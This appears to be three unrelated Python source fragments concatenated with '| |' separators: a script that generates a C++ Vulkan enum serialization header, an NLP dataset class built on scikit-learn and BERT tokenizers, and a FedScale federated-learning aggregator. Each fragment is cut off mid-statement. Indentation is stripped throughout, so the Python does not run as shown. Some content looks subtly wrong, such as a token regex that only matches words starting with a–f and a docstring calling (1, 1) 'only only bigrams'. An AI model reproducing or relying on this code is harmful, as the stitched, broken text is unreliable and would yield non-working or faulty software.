outFile.writelines(["\nconstexpr std::array<std::string_view, ", str(
len(vendors)), "> vendors = {{\n"])
for vendor in vendors:
outFile.writelines([' \"', vendor.tag, '\",\n'])
outFile.write('}};\n')
def processEnumValue(outFile, enum, value):
if not value.get('value') is None:
# Spitting out plain values
outFile.write(value.get('value'))
elif not value.get('bitpos') is None:
# Bitflag
outFile.writelines(
['0x', format(1 << int(value.get('bitpos')), '08X')])
elif not value.get('alias') is None:
processEnumValue(outFile, enum, enum.find(value.get('alias')))
def processEnums(outFile, enums, vendors, first, last):
for enum in enums:
# Skip VkResult
if enum.tag == 'VkResult':
continue
# Skip if there's no values, MSVC can't do zero-sized arrays
if len(enum.findall('./')) == 0:
continue
outFile.writelines(
['\nconstexpr EnumValueSet ', enum.tag, 'Sets[] = {\n'])
# Determine how much to chop off the front
strName = enum.tag
typeDigit = ''
# Determine if type ends with vendor tag
vendorName = ''
for vendor in vendors:
if strName.endswith(vendor.tag):
vendorName = vendor.tag
strName = strName[:-len(vendorName)]
if strName[-1].isdigit():
typeDigit = strName[-1]
strName = strName[:-1]
if strName.endswith('FlagBits'):
strName = strName[:-8]
# Construct most likely enum prefix
mainPrefix = ''
for char in strName:
if mainPrefix == '':
mainPrefix += char
elif char.isupper():
mainPrefix += '_'
mainPrefix += char.upper()
else:
mainPrefix += char.upper()
mainPrefix += '_'
if typeDigit != '':
mainPrefix += typeDigit
mainPrefix += '_'
current = first
while current <= last:
for value in enum.findall('./'):
if int(value.get('first')) != current:
continue
outFile.write(" {\"")
valueStr = value.tag
if valueStr.startswith(mainPrefix):
valueStr = valueStr[len(mainPrefix):]
if vendorName != '' and valueStr.endswith(vendorName):
valueStr = valueStr[:-len(vendorName)-1]
if valueStr.endswith('_BIT'):
valueStr = valueStr[:-4]
outFile.write(valueStr)
outFile.write("\", ")
processEnumValue(outFile, enum, value)
outFile.write("},\n")
current += 1
outFile.write('};\n')
def main(argv):
inputFile = ''
outputFile = ''
try:
opts, args = getopt.getopt(argv, 'i:o:', [])
except getopt.GetoptError:
print('Error parsing options')
sys.exit(1)
for opt, arg in opts:
if opt == '-i':
inputFile = arg
elif opt == '-o':
outputFile = arg
if(inputFile == ''):
print("Error: No Vulkan XML file specified")
sys.exit(1)
if(outputFile == ''):
print("Error: No output file specified")
sys.exit(1)
try:
dataXml = ET.parse(inputFile)
dataRoot = dataXml.getroot()
except:
print("Error: Could not open input file: ", inputFile)
sys.exit(1)
firstVersion = int(dataRoot.get('first'))
lastVersion = int(dataRoot.get('last'))
outFile = open(outputFile, "w")
# Common Header
with open("common_header.txt") as fd:
outFile.write(fd.read())
outFile.write('\n')
#
outFile.write("""#ifndef VK_VALUE_SERIALIZATION_HPP
#define VK_VALUE_SERIALIZATION_HPP
/* USAGE:
To use, include this header where the declarations for the boolean checks are required.
On *ONE* compilation unit, include the definition of `#define VK_VALUE_SERIALIZATION_CONFIG_MAIN`
so that the definitions are compiled somewhere following the one definition rule.
*/
#include <vulkan/vulkan.h>
#include <string>
#include <string_view>
""")
# Static Asserts
outFile.writelines(["\nstatic_assert(VK_HEADER_VERSION >= ", str(
firstVersion), ", \"VK_HEADER_VERSION is from before the supported range.\");\n"])
outFile.writelines(["static_assert(VK_HEADER_VERSION <= ", str(
lastVersion), ", \"VK_HEADER_VERSION is from after the supported range.\");\n"])
# Function Declarataions
outFile.write("""
/**
* @brief Macro that automatically stringifies the given Vulkan type for serialization
* @param VKTYPE Actual Vulkan type
* @param VALUE Value to be serialized
* @param STRPTR Pointer to the string to store the serialization in. Only modified if true is
* returned.
* @return True if serialization was successful. False otherwise.
*/
#define VK_SERIALIZE(VKTYPE, VALUE, STRPTR) vk_serialize<VKTYPE>(#VKTYPE, VALUE, STRPTR)
/**
* @brief Macro that automatically stringifies the given Vulkan type for parsing
* @param VKTYPE Actual Vulkan type
* @param STRING String to be parsed
* @param VALPTR Pointer to the value to store the parsed value in. Only modified if true is
* returned.
* @return True if serialization was successful. False otherwise.
*/
#define VK_PARSE(VKTYPE, STRING, VALPTR) vk_parse<VKTYPE>(#VKTYPE, STRING, VALPTR)
/**
* @brief Serializes a Vulkan enumerator/flag type (32-bit)
* @param vkType Name of the Vulkan enumerator/flag type
* @param vkValue Value being serialized
* @param pString Pointer to a string that will be modified with the serialized value. Only modified
* if true is returned.
* @return True the value was successfully serialized. False otherwise.
*/
bool vk_serialize(std::string_view vkType, uint32_t vkValue, std::string *pString);
/**
* @brief Parses a Vulkan enumerator/flag serialized string (32-bit)
* @param vkType Name of the Vulkan enumerator/flag type
* @param vkString String being parsed
* @param pValue Pointer to a value that will be modified with the parsed value. Only modified if
* true is returned.
* @return True the value was successfully serialized. False otherwise.
*/
bool vk_parse(std::string_view vkType, std::string vkString, uint32_t *pValue);
/**
* @brief Serializes a Vulkan enumerator/flag type (64-bit)
* @param vkType Name of the Vulkan enumerator/flag type
* @param vkValue Value being serialized
* @param pString Pointer to a string that will be modified with the serialized value. Only modified
* if true is returned.
* @return True the value was successfully serialized. False otherwise.
*/
bool vk_serialize(std::string_view vkType, uint64_t vkValue, std::string *pString);
/**
* @brief Parses a Vulkan enumerator/flag serialized string (64-bit)
* @param vkType Name of the Vulkan enumerator/flag type
* @param vkString String being parsed
* @param pValue Pointer to a value that will be modified with the parsed value. Only modified if
* true is returned.
* @return True the value was successfully serialized. False otherwise.
*/
bool vk_parse(std::string_view vkType, std::string vkString, uint64_t *pValue);
/**
* @brief Serializes a Vulkan enumerator/flag type
* @tparam Vulkan type being serialized
* @param vkType Name of the Vulkan enumerator/flag type
* @param vkValue Value being serialized
* @param pString Pointer to a string that will be modified with the serialized value. Only modified
* if true is returned.
* @return True the value was successfully serialized. False otherwise.
*/
template <typename T>
bool vk_serialize(std::string_view vkType, T vkValue, std::string *pString) {
return vk_serialize(vkType, static_cast<uint32_t>(vkValue), pString);
}
/**
* @brief Parses a Vulkan enumerator/flag serialized string
* @tparam Vulkan type being parsed
* @param vkType Name of the Vulkan enumerator/flag type
* @param vkString String being parsed
* @param pValue Pointer to a value that will be modified with the parsed value. Only modified if
* true is returned.
* @return True the value was successfully serialized. False otherwise.
*/
template <typename T>
bool vk_parse(std::string_view vkType, std::string vkString, T *pValue) {
uint32_t retVal = 0;
auto found = vk_parse(vkType, vkString, &retVal);
if (found) {
*pValue = static_cast<T>(retVal);
}
return found;
}
""")
# Definition Start
outFile.write("\n#ifdef VK_VALUE_SERIALIZATION_CONFIG_MAIN\n")
outFile.write("\n#include <algorithm>\n")
outFile.write("#include <array>\n")
outFile.write("#include <cstring>\n")
outFile.write("\nnamespace {\n")
# Vendors
vendors = dataRoot.findall('vendors/')
processVendors(outFile, vendors)
# EnumSet Declaration
outFile.write("\nstruct EnumValueSet {\n")
outFile.write(" std::string_view name;\n")
outFile.write(" int64_t value;\n")
outFile.write("};\n")
# Enums
enums = dataRoot.findall('enums/')
processEnums(outFile, enums, vendors, firstVersion, lastVersion)
# Enum Type Declaration
outFile.write("\nstruct EnumType {\n")
outFile.write(" std::string_view name;\n")
outFile.write(" EnumValueSet const* data;\n")
outFile.write(" uint32_t count;\n")
outFile.write(" bool allowEmpty;\n")
outFile.write("};\n")
# Enum Pointer Array
outFile.writelines(["\nconstexpr std::array<EnumType, ", str(
len(enums)-1), "> enumTypes = {{\n"]) # -1 for not doing VkResult
for enum in enums:
if enum.tag == 'VkResult':
continue
valueCount = len(enum.findall('./'))
if valueCount == 0:
outFile.writelines(
[" {\"", str(enum.tag), "\", nullptr, 0, true},\n"])
else:
allowEmpty = "true"
for enumVal in enum.findall('./'):
if enumVal.get('first') == enum.get('first'):
allowEmpty = "false"
outFile.writelines([" {\"", str(enum.tag), "\", ", str(
enum.tag), "Sets, ", str(valueCount), ", ", allowEmpty, "},\n"])
outFile.write('}};\n')
# Function definitions
outFile.write("""
/**
* @brief Removes a vendor tag from the end of the given string view
* @param view String view to remove the vendor tag from
* @return A string_view without the vendor tag, if it was suffixed
*/
std::string_view stripVendor(std::string_view view) {
for (auto const &it : vendors) {
// Don't strip if it's all that's left
if (view == it)
break;
if (strncmp(view.data() + view.size() - it.size(), it.data(), it.size()) == 0) {
view = view.substr(0, view.size() - it.size());
break;
}
}
return view;
}
/**
* @brief Strips '_BIT' from the end of a string, if there
*/
std::string_view stripBit(std::string_view view) {
if (view.size() > strlen("_BIT")) {
if (view.substr(view.size() - strlen("_BIT")) == "_BIT") {
return view.substr(0, view.size() - strlen("_BIT"));
}
}
return view;
}
bool getEnumType(std::string_view vkType,
EnumValueSet const **ppStart,
EnumValueSet const **ppEnd,
bool *pAllowEmpty) {
// Check for a conversion from Flags -> FlagBits
std::string localString;
if (vkType.rfind("Flags") != std::string::npos) {
localString = vkType;
auto it = localString.rfind("Flags");
localString = localString.replace(it, strlen("Flags"), "FlagBits");
vkType = localString;
}
// Try the original name
for (auto const &it : enumTypes) {
if (vkType == std::string_view{it.name}) {
*ppStart = | |
import os
import pickle
import re
from abc import ABCMeta, abstractproperty
from itertools import chain
from numbers import Number
from types import MethodType
from typing import Dict, Generator, Iterable, List, Optional, Tuple, Union
from typing_extensions import Literal
from urllib.request import urlretrieve
from odin.backend.types_helpers import DataType, LabelType
import numpy as np
import tensorflow as tf
from numpy import ndarray
from odin.fuel.dataset_base import IterableDataset, get_partition
from odin.utils import one_hot
from scipy import sparse
from scipy.sparse import csr_matrix, spmatrix
from six import add_metaclass, string_types
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.exceptions import NotFittedError
from sklearn.utils.validation import check_is_fitted
try:
from tokenizers import Encoding
from tokenizers.implementations import BaseTokenizer
except ImportError:
Encoding = "Encoding"
BaseTokenizer = object
# ===========================================================================
# Helpers
# ===========================================================================
_token_pattern = re.compile(r"(?u)\b[a-fA-F]\w+\b")
def _simple_tokenizer(doc: str) -> List[str]:
return _token_pattern.findall(doc)
def _simple_preprocess(doc: str) -> str:
doc = doc.lower().strip()
doc = re.sub(r"'", "", doc)
doc = re.sub(r"\W", " ", doc)
doc = re.sub(r"\s+", " ", doc)
return doc
# ===========================================================================
# Base dataset
# ===========================================================================
@add_metaclass(ABCMeta)
class NLPDataset(IterableDataset):
r"""
Arguments:
algorithm: {'tf', 'tfidf', 'bert'}
Which algorithm used for tokenizing
'tf' - term frequency or bag-of-words
'tfidf' - term count and inverse document frequency
'count' - count vectorizer
'bert' - BERT tokenizer
vocab_size: int
The size of the final vocabulary, including all tokens and alphabet.
min_frequency: int
When building the vocabulary ignore terms that have a document
frequency strictly lower than the given threshold. This value is also
called cut-off in the literature.
If float in range of [0.0, 1.0], the parameter represents a proportion
of documents, integer absolute counts.
This parameter is ignored if vocabulary is not None.
max_frequency : float or int, default=1.0
When building the vocabulary ignore terms that have a document
frequency strictly higher than the given threshold (corpus-specific
stop words).
If float in range [0.0, 1.0], the parameter represents a proportion of
documents, integer absolute counts.
This parameter is ignored if vocabulary is not None.
limit_alphabet: int
The maximum different characters to keep in the alphabet.
max_length : int
longest document length
ngram_range : tuple (min_n, max_n), default=(1, 1)
The lower and upper boundary of the range of n-values for different
n-grams to be extracted. All values of n such that min_n <= n <= max_n
will be used. For example an ``ngram_range`` of ``(1, 1)`` means only
only bigrams.
Only applies if ``analyzer is not callable``.
"""
def __init__(self,
algorithm: str = 'tf',
vocab_size: int = 1000,
min_frequency: int = 2,
max_frequency: float = 0.98,
limit_alphabet: int = 1000,
max_length: Optional[int] = 1000,
ngram_range: Tuple[int, int] = (1, 1),
vocabulary: Dict[str, int] = None,
retrain_tokenizer: bool = False,
cache_path: str = "~/nlp_data"):
self._cache_path = os.path.abspath(os.path.expanduser(cache_path))
self._labels = []
#
self._vocabulary = None
if vocabulary is not None:
vocab_size = len(vocabulary)
with open(os.path.join(self.cache_path, "bert_vocab.txt"), 'w') as f:
for special_token in ("[SEP]", "[UNK]", "[CLS]", "[PAD]", "[MASK]"):
f.write(f"{special_token}\n")
for term, idx in sorted(vocabulary.items(), key=lambda x: x[-1]):
f.write(term + '\n')
self._init_vocabulary = vocabulary
self.max_length = max_length
self.vocab_size = int(vocab_size)
self.min_frequency = int(min_frequency)
self.max_frequency = float(max_frequency)
self.limit_alphabet = int(limit_alphabet)
self.ngram_range = tuple(ngram_range)
self.retrain_tokenizer = bool(retrain_tokenizer)
# load exists tokenizer
algorithm = str(algorithm).lower().strip()
assert algorithm in ('tf', 'tfidf', 'bert', 'count'), \
f"Support algorithm: tf, tfidf, count and bert; but given:{algorithm}"
self.algorithm = algorithm
self._tokenizer = None
@property
def data_type(self) -> DataType:
return 'text'
@property
def label_type(self) -> LabelType:
raise NotImplementedError
@property
def shape(self) -> List[int]:
return self.transform('train').shape[1:]
@property
def labels(self) -> List[str]:
return np.array(self._labels)
@abstractproperty
def train_text(self) -> Iterable[str]:
raise NotImplementedError
@abstractproperty
def valid_text(self) -> Iterable[str]:
raise NotImplementedError
@abstractproperty
def test_text(self) -> Iterable[str]:
raise NotImplementedError
@property
def train_labels(self) -> Union[ndarray, spmatrix]:
return np.asarray([])
@property
def valid_labels(self) -> Union[ndarray, spmatrix]:
return np.asarray([])
@property
def test_labels(self) -> Union[ndarray, spmatrix]:
return np.asarray([])
def filter_by_length(
self,
inputs: Union[int, List[str], List[Encoding]],
iqr_multiplier: float = 1.5,
length_range: Optional[Tuple[int, int]] = None
) -> Tuple[List[bool], int, int]:
r""" Using inter-quartile to filter out outlier documents by their
tokenized lengths. """
lengths = np.asarray(
[
len(i.split(" ")) if isinstance(i, string_types) else
(int(i) if isinstance(i, Number) else len(i)) for i in inputs
],
dtype=np.int32,
)
if length_range is None:
q1 = np.quantile(lengths, 0.25)
q3 = np.quantile(lengths, 0.75)
iqr = q3 - q1
lmin = q1 - iqr_multiplier * iqr
lmax = q3 + iqr_multiplier * iqr
else:
lmin, lmax = length_range
mask = np.logical_and(lengths > lmin, lengths < lmax)
return mask, lmin, lmax
def transform(self,
documents: Optional[Union[str, List[str]]] = None) -> spmatrix:
r""" Vectorize the input documents """
# cached transformed dataset
if isinstance(documents, string_types) and \
documents in ('train', 'valid', 'test'):
attr_name = f'_x_{documents}'
if hasattr(self, attr_name):
return getattr(self, attr_name)
x = self.transform(
get_partition(documents,
train=self.train_text,
valid=self.valid_text,
test=self.test_text))
setattr(self, attr_name, x)
return x
# other data
if self.algorithm in ('tf', 'tfidf', 'count'):
x = self.tokenizer.transform(documents)
# sorted ensure right ordering for Tensorflow SparseTensor
else:
if isinstance(documents, Generator):
documents = [i for i in documents]
x = sparse.csr_matrix(
[i.ids for i in self.encode(documents, post_process=True)])
return x
@property
def cache_path(self) -> str:
if not os.path.exists(self._cache_path):
os.makedirs(self._cache_path)
return self._cache_path
@property
def tokenizer(self) -> Union[BaseTokenizer, CountVectorizer, TfidfVectorizer]:
pkl_path = os.path.join(self.tokenizer_path, "model.pkl")
if self._tokenizer is not None:
return self._tokenizer
### get pickled tokenizer
if os.path.exists(pkl_path) and not self.retrain_tokenizer:
with open(pkl_path, 'rb') as f:
tokenizer = pickle.load(f)
### train new tokenizer
else:
self.retrain_tokenizer = False
if self.algorithm == 'bert':
from tokenizers import BertWordPieceTokenizer
tokenizer = BertWordPieceTokenizer(
vocab_file=None if self._init_vocabulary is None else os.path.
join(self.cache_path, "bert_vocab.txt"))
tokenizer.enable_truncation(max_length=self.max_length)
tokenizer.enable_padding(length=self.max_length)
# train the tokenizer
if self._init_vocabulary is None:
path = os.path.join(self.cache_path, 'train.txt')
with open(path, 'w') as f:
for i in chain(self.train_text, self.valid_text, self.test_text):
if len(i) == 0:
continue
f.write(i + "\n" if i[-1] != "\n" else i)
tokenizer.train(files=path,
vocab_size=self.vocab_size,
min_frequency=self.min_frequency,
limit_alphabet=self.limit_alphabet,
show_progress=True)
tokenizer.save_model(self.tokenizer_path)
elif self.algorithm in ('count', 'tf', 'tfidf'):
if self.algorithm == 'count':
tokenizer = CountVectorizer(input='content',
ngram_range=self.ngram_range,
min_df=self.min_frequency,
max_df=self.max_frequency,
max_features=self.vocab_size,
vocabulary=self._init_vocabulary,
tokenizer=_simple_tokenizer,
stop_words='english')
elif self.algorithm in ('tf', 'tfidf'):
tokenizer = TfidfVectorizer(
input='content',
ngram_range=self.ngram_range,
min_df=self.min_frequency,
max_df=self.max_frequency,
max_features=self.vocab_size,
stop_words='english',
vocabulary=self._init_vocabulary,
tokenizer=_simple_tokenizer,
use_idf=False if self.algorithm == 'tf' else True)
tokenizer.fit(
(_simple_preprocess(i)
for i in chain(self.train_text, self.valid_text, self.test_text)))
else:
raise NotImplementedError
# save the pickled model
with open(pkl_path, "wb") as f:
pickle.dump(tokenizer, f)
### assign and return
self._tokenizer = tokenizer
return self._tokenizer
@property
def tokenizer_path(self) -> str:
p = os.path.join(
self.cache_path, f"tokenizer_{self.algorithm}_{self.vocab_size}_"
f"{self.min_frequency}_{self.max_frequency}_"
f"{self.limit_alphabet}")
if not os.path.exists(p):
os.makedirs(p)
return p
@property
def vocabulary(self) -> Dict[int, str]:
if self._vocabulary is None:
if self.algorithm in ('tf', 'tfidf', 'count'):
vocab = self.tokenizer.vocabulary_
else:
vocab = self.tokenizer.get_vocab()
self._vocabulary = {
v: k for k, v in sorted(vocab.items(), key=lambda x: x[-1])
}
return self._vocabulary
@property
def vocabulary_size(self) -> int:
return len(self.vocabulary)
def encode(self,
inputs: Union[str, List[str]],
add_special_tokens: bool = True,
post_process: bool = False) -> List[Encoding]:
r""" Encode sequence of text string """
is_batch = True
if isinstance(inputs, string_types):
inputs = [inputs]
is_batch = False
outputs = self.tokenizer.encode_batch(inputs, add_special_tokens=True)
if post_process:
outputs = [
self.tokenizer.post_process(i, add_special_tokens=add_special_tokens)
for i in outputs
]
return outputs if is_batch else outputs[0]
def post_process(self,
encoding,
add_special_tokens: bool = True) -> List[Encoding]:
r""" Apply all the post-processing steps to the given encodings.
The various steps are:
1. Truncate according to global params (provided to `enable_truncation`)
2. Apply the PostProcessor
3. Pad according to global params. (provided to `enable_padding`)
"""
is_batch = True
if isinstance(encoding, Encoding):
encoding = [encoding]
is_batch = False
outputs = [
self.tokenizer.post_process(i, add_special_tokens=add_special_tokens)
for i in encoding
]
return outputs if is_batch else outputs[0]
def decode(self,
ids: List[int],
skip_special_tokens: Optional[bool] = True) -> List[str]:
r""" Decode sequence of integer indices and return original sequence """
is_batch = True
if not isinstance(ids[0], (tuple, list, ndarray)):
ids = [ids]
is_batch = False
outputs = self.tokenizer.decode_batch(
ids, skip_special_tokens=skip_special_tokens)
return outputs if is_batch else outputs[0]
def create_dataset(self,
partition: Literal['train', 'valid', 'test'] = 'train',
*,
batch_size: Optional[int] = 32,
drop_remainder: bool = False,
shuffle: int = 1000,
cache: Optional[str] = '',
prefetch: Optional[int] = tf.data.experimental.AUTOTUNE,
parallel: Optional[int] = tf.data.experimental.AUTOTUNE,
label_percent: Union[bool, float] = False,
seed: int = 1) -> tf.data.Dataset:
r"""
Arguments:
partition : {'train', 'valid', 'test'}
label_percent : a Boolean or Scalar. If True, return both image and label,
otherwise, only image is returned.
If a scalar is provided, it indicate the percent | |
# -*- coding: utf-8 -*-
from cmath import log
from fedscale.core import response
from fedscale.core.fl_aggregator_libs import *
from fedscale.core.resource_manager import ResourceManager
from fedscale.core import events
from fedscale.core import job_api_pb2
import fedscale.core.job_api_pb2_grpc as job_api_pb2_grpc
import torch
from torch.utils.tensorboard import SummaryWriter
import threading
import pickle
import grpc
from concurrent import futures
MAX_MESSAGE_LENGTH = 1*1024*1024*1024 # 1GB
class Aggregator(job_api_pb2_grpc.JobServiceServicer):
"""This centralized aggregator collects training/testing feedbacks from executors"""
def __init__(self, args):
logging.info(f"Job args {args}")
self.args = args
self.experiment_mode = args.experiment_mode
self.device = args.cuda_device if args.use_cuda else torch.device('cpu')
# ======== env information ========
self.this_rank = 0
self.global_virtual_clock = 0.
self.round_duration = 0.
self.resource_manager = ResourceManager(self.experiment_mode)
self.client_manager = self.init_client_manager(args=args)
# ======== model and data ========
self.model = None
self.model_in_update = 0
self.update_lock = threading.Lock()
self.model_weights = collections.OrderedDict() # all weights including bias/#_batch_tracked (e.g., state_dict)
self.last_gradient_weights = [] # only gradient variables
self.model_state_dict = None
# ======== channels ========
self.connection_timeout = self.args.connection_timeout
self.executors = None
self.grpc_server = None
# ======== Event Queue =======
self.individual_client_events = {} # Unicast
self.sever_events_queue = collections.deque()
self.broadcast_events_queue = collections.deque() # Broadcast
# ======== runtime information ========
self.tasks_round = 0
# NOTE: sampled_participants = sampled_executors in deployment,
# because every participant is an executor. However, in simulation mode,
# executors is the physical machines (VMs), thus:
# |sampled_executors| << |sampled_participants| as an VM may run multiple participants
self.sampled_participants = []
self.sampled_executors = []
self.round_stragglers = []
self.model_update_size = 0.
self.collate_fn = None
self.task = args.task
self.round = 0
self.start_run_time = time.time()
self.client_conf = {}
self.stats_util_accumulator = []
self.loss_accumulator = []
self.client_training_results = []
# number of registered executors
self.registered_executor_info = set()
self.test_result_accumulator = []
self.testing_history = {'data_set': args.data_set, 'model': args.model, 'sample_mode': args.sample_mode,
'gradient_policy': args.gradient_policy, 'task': args.task, 'perf': collections.OrderedDict()}
self.log_writer = SummaryWriter(log_dir=logDir)
# ======== Task specific ============
self.imdb = None # object detection
def setup_env(self):
self.setup_seed(seed=self.this_rank)
# set up device
if self.args.use_cuda and self.device == None:
for i in range(torch.cuda.device_count()):
try:
self.device = torch.device('cuda:'+str(i))
torch.cuda.set_device(i)
_ = torch.rand(1).to(device=self.device)
logging.info(f'End up with cuda device ({self.device})')
break
except Exception as e:
assert i != torch.cuda.device_count()-1, 'Can not find available GPUs'
self.optimizer = ServerOptimizer(self.args.gradient_policy, self.args, self.device)
def setup_seed(self, seed=1):
"""Set global random seed for better reproducibility"""
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.deterministic = True
def init_control_communication(self):
# Create communication channel between aggregator and worker
# This channel serves control messages
logging.info(f"Initiating control plane communication ...")
if self.experiment_mode == events.SIMULATION_MODE:
num_of_executors = 0
for ip_numgpu in self.args.executor_configs.split("="):
ip, numgpu = ip_numgpu.split(':')
for numexe in numgpu.strip()[1:-1].split(','):
for _ in range(int(numexe.strip())):
num_of_executors += 1
self.executors = list(range(num_of_executors))
else:
self.executors = list(range(self.args.total_worker))
# initiate a server process
self.grpc_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=20),
options=[
('grpc.max_send_message_length', MAX_MESSAGE_LENGTH),
('grpc.max_receive_message_length', MAX_MESSAGE_LENGTH),
],
)
job_api_pb2_grpc.add_JobServiceServicer_to_server(self, self.grpc_server)
port = '[::]:{}'.format(self.args.ps_port)
logging.info(f'%%%%%%%%%% Opening aggregator sever using port {port} %%%%%%%%%%')
self.grpc_server.add_insecure_port(port)
self.grpc_server.start()
def init_data_communication(self):
"""For jumbo traffics (e.g., training results).
"""
pass
def init_model(self):
"""Load model"""
if self.args.task == "detection":
cfg_from_file(self.args.cfg_file)
np.random.seed(self.cfg.RNG_SEED)
self.imdb, _, _, _ = combined_roidb("voc_2007_test", ['DATA_DIR', self.args.data_dir], server=True)
self.model = init_model()
self.model_weights = self.model.state_dict()
def init_client_manager(self, args):
"""
Currently we implement two client managers:
1. Random client sampler
- it selects participants randomly in each round
- [Ref]: https://arxiv.org/abs/1902.01046
2. Oort sampler
- Oort prioritizes the use of those clients who have both data that offers the greatest utility
in improving model accuracy and the capability to run training quickly.
- [Ref]: https://www.usenix.org/conference/osdi21/presentation/lai
"""
# sample_mode: random or kuiper
client_manager = clientManager(args.sample_mode, args=args)
return client_manager
def load_client_profile(self, file_path):
"""For Simulation Mode: load client profiles/traces"""
global_client_profile = {}
if os.path.exists(file_path):
with open(file_path, 'rb') as fin:
# {clientId: [computer, bandwidth]}
global_client_profile = pickle.load(fin)
return global_client_profile
def executor_info_handler(self, executorId, info):
self.registered_executor_info.add(executorId)
logging.info(f"Received executor {executorId} information, {len(self.registered_executor_info)}/{len(self.executors)}")
# have collected all executors
# In this simulation, we run data split on each worker, so collecting info from one executor is enough
# Waiting for data information from executors, or timeout
if len(self.registered_executor_info) == len(self.executors):
num_of_clients = 1
logging.info(f"Loading {len(info['size'])} client traces ...")
for _size in info['size']:
# since the worker rankId starts from 1, we also configure the initial dataId as 1
mapped_id = num_of_clients%len(self.client_profiles) if len(self.client_profiles) > 0 else 1
systemProfile = self.client_profiles.get(mapped_id, {'computation': 1.0, 'communication':1.0})
clientId = num_of_clients if self.experiment_mode == events.SIMULATION_MODE else executorId
self.client_manager.registerClient(executorId, clientId, size=_size, speed=systemProfile)
self.client_manager.registerDuration(clientId, batch_size=self.args.batch_size,
upload_step=self.args.local_steps, upload_size=self.model_update_size, download_size=self.model_update_size)
num_of_clients += 1
logging.info("Info of all feasible clients {}".format(self.client_manager.getDataInfo()))
# start to sample clients
self.round_completion_handler()
def tictak_client_tasks(self, sampled_clients, num_clients_to_collect):
if self.experiment_mode == events.SIMULATION_MODE:
# NOTE: We try to remove dummy events as much as possible in simulations,
# by removing the stragglers/offline clients in overcommitment"""
sampledClientsReal = []
completionTimes = []
completed_client_clock = {}
# 1. remove dummy clients that are not available to the end of training
for client_to_run in sampled_clients:
client_cfg = self.client_conf.get(client_to_run, self.args)
exe_cost = self.client_manager.getCompletionTime(client_to_run,
batch_size=client_cfg.batch_size, upload_step=client_cfg.local_steps,
upload_size=self.model_update_size, download_size=self.model_update_size)
roundDuration = exe_cost['computation'] + exe_cost['communication']
# if the client is not active by the time of collection, we consider it is lost in this round
if self.client_manager.isClientActive(client_to_run, roundDuration + self.global_virtual_clock):
sampledClientsReal.append(client_to_run)
completionTimes.append(roundDuration)
completed_client_clock[client_to_run] = exe_cost
num_clients_to_collect = min(num_clients_to_collect, len(completionTimes))
# 2. get the top-k completions to remove stragglers
sortedWorkersByCompletion = sorted(range(len(completionTimes)), key=lambda k:completionTimes[k])
top_k_index = sortedWorkersByCompletion[:num_clients_to_collect]
clients_to_run = [sampledClientsReal[k] for k in top_k_index]
dummy_clients = [sampledClientsReal[k] for k in sortedWorkersByCompletion[num_clients_to_collect:]]
round_duration = completionTimes[top_k_index[-1]]
completionTimes.sort()
return clients_to_run, dummy_clients, completed_client_clock, round_duration, completionTimes[:num_clients_to_collect]
else:
completed_client_clock = {client:{'computation': 1, 'communication':1} for client in sampled_clients}
completionTimes = [1 for c in sampled_clients]
return sampled_clients, sampled_clients, completed_client_clock, 1, completionTimes
def run(self):
self.setup_env()
self.init_model()
self.save_last_param()
self.model_update_size = sys.getsizeof(pickle.dumps(self.model))/1024.0*8. # kbits
self.client_profiles = self.load_client_profile(file_path=self.args.device_conf_file)
self.init_control_communication()
self.init_data_communication()
self.event_monitor()
def select_participants(self, select_num_participants, overcommitment=1.3):
return sorted(self.client_manager.resampleClients(
int(select_num_participants*overcommitment), cur_time=self.global_virtual_clock))
def client_completion_handler(self, results):
"""We may need to keep all updates from clients, if so, we need to append results to the cache"""
# Format:
# -results = {'clientId':clientId, 'update_weight': model_param, 'moving_loss': round_train_loss,
# 'trained_size': count, 'wall_duration': time_cost, 'success': is_success 'utility': utility}
if self.args.gradient_policy in ['q-fedavg']:
self.client_training_results.append(results)
# Feed metrics to client sampler
self.stats_util_accumulator.append(results['utility'])
self.loss_accumulator.append(results['moving_loss'])
self.client_manager.registerScore(results['clientId'], results['utility'],
auxi=math.sqrt(results['moving_loss']),
time_stamp=self.round,
duration=self.virtual_client_clock[results['clientId']]['computation']+
self.virtual_client_clock[results['clientId']]['communication']
)
device = self.device
"""
[FedAvg] "Communication-Efficient Learning of Deep Networks from Decentralized Data".
<NAME>, <NAME>, <NAME>, <NAME>, <NAME>. AISTATS, 2017
"""
# Start to take the average of updates, and we do not keep updates to save memory
# Importance of each update is 1/#_of_participants
# importance = 1./self.tasks_round
self.update_lock.acquire()
# ================== Aggregate weights ======================
self.model_in_update += 1
if self.model_in_update == 1:
for p in results['update_weight']:
temp_list = results['update_weight'][p]
if isinstance(results['update_weight'][p], list):
temp_list = np.asarray(temp_list, dtype=np.float32)
self.model_weights[p].data = torch.from_numpy(temp_list).to(device=device)
else:
for p in results['update_weight']:
temp_list = results['update_weight'][p]
if isinstance(results['update_weight'][p], list):
temp_list = np.asarray(temp_list, dtype=np.float32)
self.model_weights[p].data += torch.from_numpy(temp_list).to(device=device)
if self.model_in_update == self.tasks_round:
for p in self.model_weights:
d_type = self.model_weights[p].data.dtype
self.model_weights[p].data = (self.model_weights[p]/float(self.tasks_round)).to(dtype=d_type)
self.update_lock.release()
def save_last_param(self):
self.last_gradient_weights = [p.data.clone() for p in self.model.parameters()]
def round_weight_handler(self, last_model):
"""Update model when the round completes"""
if self.round > 1:
self.model.load_state_dict(self.model_weights)
current_grad_weights = [param.data.clone() for param in self.model.parameters()]
self.optimizer.update_round_gradient(last_model, current_grad_weights, self.model)
def round_completion_handler(self):
self.global_virtual_clock += self.round_duration
self.round += 1
if self.round % self.args.decay_round == 0:
self.args.learning_rate = max(self.args.learning_rate*self.args.decay_factor, self.args.min_learning_rate)
# handle the global update w/ current and last
self.round_weight_handler(self.last_gradient_weights)
avgUtilLastround = sum(self.stats_util_accumulator)/max(1, len(self.stats_util_accumulator))
# assign avg reward to explored, but not ran workers
for clientId in self.round_stragglers:
self.client_manager.registerScore(clientId, avgUtilLastround,
time_stamp=self.round,
duration=self.virtual_client_clock[clientId]['computation']+self.virtual_client_clock[clientId]['communication'],
success=False)
avg_loss = sum(self.loss_accumulator)/max(1, len(self.loss_accumulator))
logging.info(f"Wall clock: {round(self.global_virtual_clock)} s, round: {self.round}, Planned participants: " + \
f"{len(self.sampled_participants)}, Succeed participants: {len(self.stats_util_accumulator)}, Training loss: {avg_loss}")
